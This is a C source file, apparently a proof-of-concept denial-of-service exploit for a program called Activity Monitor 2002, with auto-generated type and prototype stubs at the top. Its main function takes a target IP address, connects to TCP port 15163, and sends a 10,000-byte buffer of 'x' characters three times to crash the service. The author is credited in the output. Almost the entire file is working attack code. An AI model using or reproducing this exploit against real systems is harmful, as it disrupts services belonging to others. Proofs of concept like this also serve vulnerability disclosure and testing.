
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_short ;
struct TYPE_2__ {long s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int dos ;
typedef int act_mon_server ;


 int AF_INET ;
 int SOCK_STREAM ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 int htons (int ) ;
 scalar_t__ inet_addr (char*) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int socket (int ,int ,int ) ;
 int write (int,char*,int) ;

int main(int argc, char **argv)
{

  int i,ck,port,sd;
  char dos[10000];

  struct sockaddr_in act_mon_server;

  if(argc < 2)
  {
    printf("\nUsage: %s <ip>\n", argv[0]);
    exit(0);
  }

  port = 15163;

  for(i = 0; i < 10000; i++) dos[i] = 'x';

  act_mon_server.sin_family = AF_INET;
  act_mon_server.sin_port = htons((u_short)port);
  act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);

  sd = socket(AF_INET, SOCK_STREAM, 0);

  ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
(act_mon_server));

  if(ck != 0) {
    perror("Connect");
    exit(0);
    }

  printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
  printf("\t\tby Luca Ercoli luca.ercoli@inwind.it\n\n");

  write(sd, dos, sizeof(dos));
  write(sd, dos, sizeof(dos));
  write(sd, dos, sizeof(dos));

  printf("\nDoS sent!\n");

  close(sd);

  exit(0);
}
